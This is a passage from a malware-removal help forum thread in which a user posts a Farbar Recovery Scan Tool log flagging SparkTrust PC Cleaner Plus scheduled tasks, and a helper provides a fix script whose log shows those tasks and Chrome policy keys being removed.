Catalyst Control Center Graphics Previews Common (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center Graphics Previews Vista (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center HydraVision Full (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
Catalyst Control Center InstallProxy (x32 Version: 2009.0908.2225.38429 - ATI Technologies, Inc.) Hidden
Catalyst Control Center Localization All (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
CCC Help Chinese Standard (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Chinese Traditional (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Czech (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Danish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Dutch (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help English (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Finnish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help French (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help German (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Greek (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Hungarian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Italian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Japanese (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Korean (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Norwegian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Polish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Portuguese (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Russian (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Spanish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Swedish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Thai (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
CCC Help Turkish (x32 Version: 2009.0908.2224.38429 - ATI) Hidden
ccc-core-static (x32 Version: 2009.0908.2225.38429 - ATI) Hidden
ccc-utility64 (Version: 2009.0908.2225.38429 - ATI) Hidden
Compatibility Pack for the 2007 Office system (HKLM-x32\...\{90120000-0020-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
CutePDF Writer 3.0 (HKLM\...\CutePDF Writer Installation) (Version:  3.0 - CutePDF.com)
CyberLink DVD Suite Deluxe (HKLM-x32\...\InstallShield_{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}) (Version: 7.0.2115 - CyberLink Corp.)
CyberLink DVD Suite Deluxe (x32 Version: 7.0.2115 - CyberLink Corp.) Hidden
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DirectX for Managed Code Update (Summer 2004) (x32 Version: 9.02.2904 - Microsoft) Hidden
Epson Easy Photo Print 2 (HKLM-x32\...\{4FB984CB-4CE4-4104-A554-D04CEFE3D690}) (Version: 2.2.3.0 - SEIKO EPSON CORPORATION)
Epson Easy Photo Print Plug-in for PMB(Picture Motion Browser) (HKLM-x32\...\{B2D55EB8-32C5-4B43-9006-9E97DECBA178}) (Version: 1.00.0000 - SEIKO EPSON CORPORATION)
Epson Event Manager (HKLM-x32\...\{03B8AA32-F23C-4178-B8E6-09ECD07EAA47}) (Version: 2.40.0001 - SEIKO EPSON CORPORATION)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version:  - Seiko Epson Corporation)
EPSON TX420 NX420 Series Manual (HKLM-x32\...\EPSON TX420 NX420 Series Manual) (Version:  - )
EPSON TX420 NX420 Series Network Guide (HKLM-x32\...\EPSON TX420 NX420 Series Network Guide) (Version:  - )
EPSON TX420 NX420 Series Printer Uninstall (HKLM\...\EPSON TX420 NX420 Series) (Version:  - SEIKO EPSON Corporation)
EpsonNet Print (HKLM-x32\...\{3E31400D-274E-4647-916C-2CACC3741799}) (Version: 2.4j - SEIKO EPSON CORPORATION)
EpsonNet Setup 3.2 (HKLM-x32\...\{C9D8A041-2963-4B31-8FFC-1500F3DB9293}) (Version: 3.2a - SEIKO EPSON CORPORATION)
Google Chrome (HKLM-x32\...\{E1AA8B0F-1176-36F1-8A91-AA19CF39C2F6}) (Version: 65.169.76 - Google, Inc.)
Google Update Helper (x32 Version: 1.3.22.5 - Google Inc.) Hidden
Hardware Diagnostic Tools (HKLM\...\PC-Doctor for Windows) (Version: 6.0.5247.34 - PC-Doctor, Inc.)
HP Advisor (HKLM-x32\...\{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}) (Version: 3.3.9512.3162 - Hewlett-Packard)
HP Customer Experience Enhancements (x32 Version: 6.0.1.3 - Hewlett-Packard) Hidden
HP Games (HKLM-x32\...\WildTangent hp Master Uninstall) (Version: 1.0.0.71 - WildTangent)
HP Odometer (HKLM-x32\...\{B8AC1A89-FFD1-4F97-8051-E505A160F562}) (Version: 2.10.0000 - Hewlett-Packard)
HP Setup (HKLM-x32\...\{17B4760F-334B-475D-829F-1A3E94A6A4E6}) (Version: 1.2.3560.3170 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{741CFE3A-1C0B-4A7D-8E08-5D78C911C09D}) (Version: 4.2.5.3 - Hewlett-Packard)
HP Support Information (HKLM-x32\...\{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}) (Version: 10.1.0002 - Hewlett-Packard)
HP Update (HKLM-x32\...\{D46D081B-F60E-467E-A7C4-117B70D76731}) (Version: 5.001.000.014 - Hewlett-Packard)
HPAsset component for HP Active Support Library (x32 Version: 3.0.2.2 - Hewlett-Packard) Hidden
HydraVision (x32 Version: 4.2.116.0 - ATI Technologies Inc.) Hidden
iTunes (HKLM\...\{D601CEAD-2E4F-4BBB-85CC-C29A4CE6A3C0}) (Version: 11.1.3.8 - Apple Inc.)
Junk Mail filter update (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
LabelPrint (HKLM-x32\...\InstallShield_{C59C179C-668D-49A9-B6EA-0121CCFC1243}) (Version: 2.5.2017 - CyberLink Corp.)
LabelPrint (x32 Version: 2.5.2017 - CyberLink Corp.) Hidden
LightScribe System Software (HKLM-x32\...\{10CCF16B-F1C9-4B24-9570-B4CCEE42392D}) (Version: 1.18.9.1 - LightScribe)
Malwarebytes Anti-Malware version 1.75.0.1300 (HKLM-x32\...\Malwarebytes' Anti-Malware_is1) (Version: 1.75.0.1300 - Malwarebytes Corporation)
Media Player (HKLM-x32\...\MediaPlayerV1alpha8359) (Version: 1.1 - Media Player)
Microsoft .NET Framework 4.5.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.5.50938 - Microsoft Corporation)
Microsoft .NET Framework 4.5.1 (Version: 4.5.50938 - Microsoft Corporation) Hidden
Microsoft Application Error Reporting (Version: 12.0.6015.5000 - Microsoft Corporation) Hidden
Microsoft Office 2010 (HKLM-x32\...\{95140000-0070-0000-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (HKLM-x32\...\Office14.Click2Run) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Office Click-to-Run 2010 (Version: 14.0.4763.1000 - Microsoft Corporation) Hidden
Microsoft Office PowerPoint Viewer 2007 (English) (HKLM-x32\...\{95120000-00AF-0409-0000-0000000FF1CE}) (Version: 12.0.6612.1000 - Microsoft Corporation)
Microsoft Office Starter 2010 - English (HKLM-x32\...\{90140011-0066-0409-0000-0000000FF1CE}) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30214.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Works (HKLM-x32\...\{15BC8CD0-A65B-47D0-A2DD-90A824590FA8}) (Version: 9.7.0621 - Microsoft Corporation)
Mozilla Firefox 27.0.1 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 27.0.1 (x86 en-US)) (Version: 27.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 27.0.1 - Mozilla)
Mozilla Thunderbird 24.2.0 (x86 en-US) (HKLM-x32\...\Mozilla Thunderbird 24.2.0 (x86 en-US)) (Version: 24.2.0 - Mozilla)
MSVCRT (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
MSVCRT_amd64 (x32 Version: 15.4.2862.0708 - Microsoft) Hidden
NVIDIA Drivers (HKLM\...\NVIDIA Drivers) (Version: 1.6 - NVIDIA Corporation)
Paint.NET v3.5.11 (HKLM\...\{72EF03F5-0507-4861-9A44-D99FD4C41418}) (Version: 3.61.0 - dotPDN LLC)
PlayReady PC Runtime amd64 (HKLM\...\{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}) (Version: 1.3.0 - Microsoft Corporation)
Power2Go (HKLM-x32\...\InstallShield_{40BF1E83-20EB-11D8-97C5-0009C5020658}) (Version: 6.0.3304 - CyberLink Corp.)
Power2Go (x32 Version: 6.0.3304 - CyberLink Corp.) Hidden
PowerDirector (HKLM-x32\...\InstallShield_{CB099890-1D5F-11D5-9EA9-0050BAE317E1}) (Version: 7.0.3503 - CyberLink Corp.)
PowerDirector (x32 Version: 7.0.3503 - CyberLink Corp.) Hidden
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.5938 - Realtek Semiconductor Corp.)
Recovery Manager (x32 Version: 5.5.2216 - CyberLink Corp.) Hidden
SparkTrust PC Cleaner Plus (HKLM-x32\...\{35827710-D042-428B-A1E5-E20E12D2FEB9}) (Version: 3.2.0.0 - SparkTrust) <==== ATTENTION
swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3502.0922 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Sync (HKLM-x32\...\{84EBDF39-4B33-49D7-A0BD-EB6E2C4E81C1}) (Version: 14.0.8089.726 - Microsoft Corporation)
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Restore Points  =========================

09-02-2014 23:03:51 Windows Update
12-02-2014 10:43:35 Windows Update
19-02-2014 05:23:30 Windows Update
20-02-2014 08:31:58 Advanced System Protector
09-03-2014 03:25:28 Installed AVG PC TuneUp 2014
13-03-2014 03:29:43 Windows Update
15-03-2014 23:04:57 avast! antivirus system restore point
16-03-2014 05:18:10 avast! antivirus system restore point
17-03-2014 01:36:55 SparkTrust PC Cleaner Plus Backup

==================== Hosts content: ==========================

2009-07-14 12:34 - 2009-06-11 07:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

Task: {008BA38B-708F-4856-AFD5-7903F65F6B35} - \LaunchApp No Task File
Task: {1D3D8FAB-691B-4E12-95B7-A6B89E2172FE} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2014-03-13] (Adobe Systems Incorporated)
Task: {21FEC08F-0231-46F0-A7D0-AFED6D89946A} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-09-24] (Hewlett-Packard)
Task: {24520CCF-5ED8-45E5-9F85-2B5A176C46F0} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HPSAObjUtilTask => C:\Program Files (x86)\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\UtilTask.exe [2014-02-25] (Microsoft)
Task: {2DDDE1F6-6A01-406E-B04F-5AB986DEED07} - System32\Tasks\avast! Emergency Update => C:\Program Files\AVAST Software\Avast\AvastEmUpdate.exe [2014-03-16] (AVAST Software)
Task: {34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} - System32\Tasks\SparkTrust Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll" RunUns <==== ATTENTION
Task: {4D9EAB9D-63CF-4A88-92AE-529E6484106C} - System32\Tasks\Adobe online update program => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2013-12-21] (Adobe Systems Incorporated)
Task: {63978307-3802-494C-A321-62E7B6BE06EA} - System32\Tasks\TuneUpUtilities_Task_BkGndMaintenance2013 => C:\Program Files (x86)\AVG\AVG PC TuneUp\OneClick.exe [2013-12-18] (AVG)
Task: {6BBD3D21-9BF1-4882-9864-9172C5466808} - System32\Tasks\Hewlett-Packard\HP Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2009-09-24] (Hewlett-Packard)
Task: {6D5E47A5-6D2D-4179-B59F-01F947F47E2C} - System32\Tasks\PCDRScheduledMaintenance => C:\Program Files\PC-Doctor for Windows\pcdrcui.exe [2009-09-18] (PC-Doctor, Inc.)
Task: {746113CB-426A-4600-9D70-1890814BADF2} - System32\Tasks\RecoveryCDWin7 => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-20] ()
Task: {79451F9F-BD6F-4B1B-9511-0149DB1BAFCF} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20] (Google Inc.)
Task: {7C387643-180A-43F2-861B-7C3746BB7FAB} - System32\Tasks\SparkTrust Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {7F93F3ED-0287-4003-AA4B-6033D187366B} - System32\Tasks\Registration => C:\Program Files (x86)\Hewlett-Packard\HP Setup\RemEngine.exe [2009-10-20] ()
Task: {8C8404EC-CEA0-42C9-9BB6-69E9F18A6F6A} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2011-06-01] (Apple Inc.)
Task: {9FAA8F16-BAE0-4F90-8A53-8E53D60C3568} - \Advanced System Protector No Task File
Task: {A6621C5E-7718-4FEC-BB07-0C84B254A5EE} - System32\Tasks\SidebarExecute => C:\Program Files (x86)\Windows Sidebar\sidebar.exe [2010-11-20] (Microsoft Corporation)
Task: {C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} - System32\Tasks\SparkTrust Update Version3 => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {CCFE2010-CEF9-4EA7-9783-89694F76AB4B} - System32\Tasks\RMCreator => C:\Program Files (x86)\Hewlett-Packard\Recovery\Reminder.exe [2009-10-16] (CyberLink)
Task: {E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} - System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: {EB356D5C-DDFD-450E-90DD-1AE28608363C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-20] (Google Inc.)
Task: {FD21BDEB-CC13-43B0-825A-79A92040584E} - \Advanced System Protector_startup No Task File
Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\PCDRScheduledMaintenance.job => C:\Program Files\PC-Doctor for Windows\pcdrcui.exe
Task: C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Registration3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION

==================== Loaded Modules (whitelisted) =============

2014-01-20 19:43 - 2013-10-23 15:24 - 00087600 _____ () C:\Windows\System32\cpwmon64.dll
2013-12-18 09:38 - 2013-12-18 09:38 - 00742200 _____ () C:\Program Files (x86)\AVG\AVG PC TuneUp\avgrepliba.dll
2009-06-26 10:25 - 2009-06-26 10:25 - 00098304 ____R () C:\Program Files (x86)\ATI Technologies\ATI.ACE\Branding\Branding.dll
2010-01-24 06:26 - 2010-01-24 06:26 - 00270336 _____ () C:\Windows\assembly\GAC_MSIL\CLI.Aspect.CrossDisplay.Graphics.Dashboard\1.0.0.0__90ba9c70f846762e\CLI.Aspect.CrossDisplay.Graphics.Dashboard.dll
2014-03-18 23:33 - 2014-03-18 21:03 - 02188800 _____ () C:\Program Files\AVAST Software\Avast\defs\14031801\algo.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll
2012-11-28 14:13 - 2012-11-28 14:13 - 01242512 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll
2014-03-16 09:06 - 2014-03-16 09:06 - 19336120 _____ () C:\Program Files\AVAST Software\Avast\libcef.dll

==================== Alternate Data Streams (whitelisted) =========

==================== Safe Mode (whitelisted) ===================

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\procexp90.Sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\PEVSystemStart => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\procexp90.Sys => ""="Driver"

==================== Disabled items from MSCONFIG ==============

MSCONFIG\startupreg: HP Remote Solution => %ProgramFiles%\Hewlett-Packard\HP Remote Solution\HP_Remote_Solution.exe
MSCONFIG\startupreg: HP Software Update => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe
MSCONFIG\startupreg: HPADVISOR => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\HPAdvisor.exe autorun=AUTORUN
MSCONFIG\startupreg: hpsysdrv => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe
MSCONFIG\startupreg: PC-Doctor for Windows localizer => C:\Program Files\PC-Doctor for Windows\localizer.exe
MSCONFIG\startupreg: RESTART_STICKY_NOTES => C:\Windows\System32\StikyNot.exe

==================== Faulty Device Manager Devices =============

==================== Event log errors: =========================

Application errors:
==================

System errors:
=============

Microsoft Office Sessions:
=========================

==================== Memory info ===========================

Percentage of memory in use: 69%
Total physical RAM: 2047.3 MB
Available physical RAM: 630.77 MB
Total Pagefile: 4094.61 MB
Available Pagefile: 2039.21 MB
Total Virtual: 8192 MB
Available Virtual: 8191.82 MB

==================== Drives ================================

Drive c: (COMPAQ) (Fixed) (Total:688.58 GB) (Free:607.13 GB) NTFS
Drive d: (FACTORY_IMAGE) (Fixed) (Total:9.95 GB) (Free:1.47 GB) NTFS ==>[System with boot components (obtained from reading drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 699 GB) (Disk ID: 1549F232)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=689 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=10 GB) - (Type=07 NTFS)

==================== End Of Log ============================



#4 gringo_pr (Bleepin Gringo)
  • Malware Response Team
  • 136,772 posts
  • Gender:Male
  • Location:Puerto rico

Posted 19 March 2014 - 07:41 AM

Hello Paulie67



I need you to download this script I have made for you --> Attached File: fixlist.txt (2.52KB)

It needs to be saved Next to the "Farbar Recovery Scan Tool" (FRST) program (If asked to overwrite existing one please allow)

Run FRST again but this time press the Fix button just once and wait.


When finished, it will make a log (fixlog.txt) next to FRST. Please copy and paste the content of this file to your reply.


NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system


Gringo
I Close My Topics If You Have Not Replied In 5 Days If You Will Be Longer Please Let Me Know

If I Have Not Replied To One Of My Topics In 48 Hrs Please Bump The Topic



My help is free, however, if you wish to make a small donation to show your appreciation or to help me continue the fight against Malware, then click here -->btn_donate_SM.gif<-- Don't worry every little bit helps.

Proud Graduate Of Malware Removal University

#5 Paulie67 (Topic Starter)
  • Members
  • 12 posts
  • Gender:Female
  • Location:Sunshine Coast, QLD

Posted 19 March 2014 - 05:13 PM

Hello Gringo,

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 13-03-2014
Ran by Paulette at 2014-03-20 07:58:01 Run:1
Running from C:\Users\Paulette\Desktop
Boot Mode: Normal
==============================================

Content of fixlist:
*****************
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
2014-03-17 11:13 - 2014-03-17 11:40 - 00000470 _____ () C:\Windows\Tasks\SparkTrust Registration3.job
2014-03-17 11:13 - 2014-03-17 11:13 - 00003140 _____ () C:\Windows\System32\Tasks\SparkTrust Registration3
2014-03-17 11:12 - 2014-03-19 00:23 - 00000480 _____ () C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000651 _____ () C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job
2014-03-17 11:12 - 2014-03-17 11:40 - 00000428 _____ () C:\Windows\Tasks\SparkTrust Update Version3.job
2014-03-17 11:12 - 2014-03-17 11:12 - 00004096 _____ () C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E
2014-03-17 11:12 - 2014-03-17 11:12 - 00003248 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3
2014-03-17 11:12 - 2014-03-17 11:12 - 00002912 _____ () C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task
Task: {34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} - System32\Tasks\SparkTrust Registration3 => Rundll32.exe "C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll" RunUns <==== ATTENTION
Task: {7C387643-180A-43F2-861B-7C3746BB7FAB} - System32\Tasks\SparkTrust Update Version3 Startup Task => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {C33AFEFD-F62C-4D0E-B761-63EB61AEBD9D} - System32\Tasks\SparkTrust Update Version3 => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe [2014-01-24] (SparkTrust Systems) <==== ATTENTION
Task: {E289BBB3-9D4A-443F-96D2-1CB0A0CFEF68} - System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job => C:\Program Files (x86)\SparkTrust\SparkTrust PC Cleaner Plus\SparkTrustPCCleanerPlus.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Registration3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\UUS3.dll <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION
Task: C:\Windows\Tasks\SparkTrust Update Version3.job => C:\Program Files (x86)\Common Files\SparkTrust\UUS3\Update3.exe <==== ATTENTION

*****************

HKLM\SOFTWARE\Policies\Google => Key deleted successfully.
C:\Windows\system32\GroupPolicy\Machine => Moved successfully.
C:\Windows\system32\GroupPolicy\GPT.ini => Moved successfully.
C:\Windows\Tasks\SparkTrust Registration3.job => Moved successfully.
C:\Windows\System32\Tasks\SparkTrust Registration3 => Moved successfully.
C:\Windows\Tasks\SparkTrust Update Version3 Startup Task.job => Moved successfully.
"C:\Windows\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E.job" => File/Directory not found.
C:\Windows\Tasks\SparkTrust Update Version3.job => Moved successfully.
"C:\Windows\System32\Tasks\SparkTrust PC Cleaner Plus_sch_381B0F30-AD71-11E3-BFA9-002354F79E9E" => File/Directory not found.
C:\Windows\System32\Tasks\SparkTrust Update Version3 => Moved successfully.
C:\Windows\System32\Tasks\SparkTrust Update Version3 Startup Task => Moved successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{34B031EB-BF2A-48C9-9EA7-F8330E51DE4C} => Key deleted successfully.
C:\Windows\System32\Tasks\SparkTrust Registration3 not found.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\SparkTrust Registration3 => Key deleted successfully.
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{7C387643-180A-43F2-861B-7C3746BB7FAB} => Key deleted successfully.
